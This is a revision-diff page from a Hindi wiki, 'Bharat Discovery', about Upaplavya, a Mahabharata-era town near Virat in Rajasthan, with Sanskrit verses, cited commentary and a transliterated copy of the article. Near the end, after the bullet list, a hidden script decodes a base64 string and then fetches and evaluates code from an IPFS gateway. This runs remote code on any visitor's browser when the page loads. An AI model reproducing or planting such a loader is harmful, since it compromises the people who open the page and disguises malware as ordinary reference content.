Difference between revisions of "उपप्लव्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*[[महाभारत]] काल में मत्स्य देश में स्थित नगर जो [[विराट]] या बैराट (ज़िला जयपुर, [[राजस्थान]]) के निकट ही था।  
+
*[[महाभारत]] काल में [[मत्स्य देश]] में स्थित नगर जो [[विराट]] या बैराट ([[जयपुर ज़िला|ज़िला जयपुर]], [[राजस्थान]]) के निकट ही था।  
 
<poem>:'उपप्लव्यं सगत्वा तु स्कंधावारं प्रविश्य प्रविश्य च, पांडवानथतान् सर्वान् शल्यस्तत्रददर्श ह'।<ref>[[उद्योग पर्व महाभारत]] 8,25</ref></poem>
 
<poem>:'उपप्लव्यं सगत्वा तु स्कंधावारं प्रविश्य प्रविश्य च, पांडवानथतान् सर्वान् शल्यस्तत्रददर्श ह'।<ref>[[उद्योग पर्व महाभारत]] 8,25</ref></poem>
 
तथा
 
तथा
 
<poem>:'ततस्त्रयो-दशे वर्षे निवृत्ते पंचापांडवा:, उपप्लव्यं विरष्टस्य समपद्यन्त सर्वश:'।<ref>[[विराट पर्व महाभारत]] 72, 14</ref></poem>
 
<poem>:'ततस्त्रयो-दशे वर्षे निवृत्ते पंचापांडवा:, उपप्लव्यं विरष्टस्य समपद्यन्त सर्वश:'।<ref>[[विराट पर्व महाभारत]] 72, 14</ref></poem>
*[[पांडव]] इस नगर में अपने वनवासकाल के बारह वर्ष और अज्ञातवास के तेरह वर्ष समाप्त होने पर आकर रहने लगे थे।  
+
*[[पांडव]] इस नगर में अपने वनवास काल के बारह [[वर्ष]] और [[अज्ञातवास]] के तेरह वर्ष समाप्त होने पर आकर रहने लगे थे।  
*यहीं उन्होंने युद्ध की तैयारिया की थीं।  
+
*यहीं उन्होंने युद्ध की तैयारियाँ की थीं।  
*महाभारत के प्रसिद्ध टीकाकार नीलकंठ ने विराट 72, 14 की टीका करते हुए उपप्लव्य के लिए लिखा है- '''विराटनगरसमीपस्थनगरान्तरम्''' अर्थात् यह नगर मत्स्य की राजधानी [[विराटनगर]] के पास ही दूसरा नगर था।  
+
*महाभारत के प्रसिद्ध टीकाकार नीलकंठ ने विराट 72, 14 की टीका करते हुए '''उपप्लव्य''' के लिए लिखा है- '''विराटनगरसमीपस्थनगरान्तरम्''' अर्थात् यह नगर मत्स्य की राजधानी [[विराटनगर]] के पास ही दूसरा नगर था।  
 
*इसका ठीक-ठीक अभिज्ञान अनिश्चित है। किन्तु यह वर्तमान [[जयपुर]] के निकट ही कहीं होगा।  
 
*इसका ठीक-ठीक अभिज्ञान अनिश्चित है। किन्तु यह वर्तमान [[जयपुर]] के निकट ही कहीं होगा।  
 
*विराटनगर की स्थिति वर्तमान वैराट के पास थी।  
 
*विराटनगर की स्थिति वर्तमान वैराट के पास थी।  
Line 12: Line 12:
 
{{प्रचार}}
 
{{प्रचार}}
 
   
 
   
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 98-99| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 98-99| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार

Latest revision as of 13:08, 16 May 2018

'upaplavyan sagatva tu skandhavaran pravishy pravishy ch, paandavanathatanh sarvanh shalyastatradadarsh h'.[1]

tatha

'tatastrayo-dashe varshe nivritte panchapaandava:, upaplavyan virashtasy samapadyant sarvash:'.[2]

  • paandav is nagar mean apane vanavas kal ke barah varsh aur ajnatavas ke terah varsh samapt hone par akar rahane lage the.
  • yahian unhoanne yuddh ki taiyariyaan ki thian.
  • mahabharat ke prasiddh tikakar nilakanth ne virat 72, 14 ki tika karate hue upaplavy ke lie likha hai- viratanagarasamipasthanagarantaramh arthath yah nagar matsy ki rajadhani viratanagar ke pas hi doosara nagar tha.
  • isaka thik-thik abhijnan anishchit hai. kintu yah vartaman jayapur ke nikat hi kahian hoga.
  • viratanagar ki sthiti vartaman vairat ke pas thi.
  • parjitar ke anusar matsy ki rajadhani upaplavy mean hi thi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 98-99| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


bahari k diyaan

sanbandhit lekh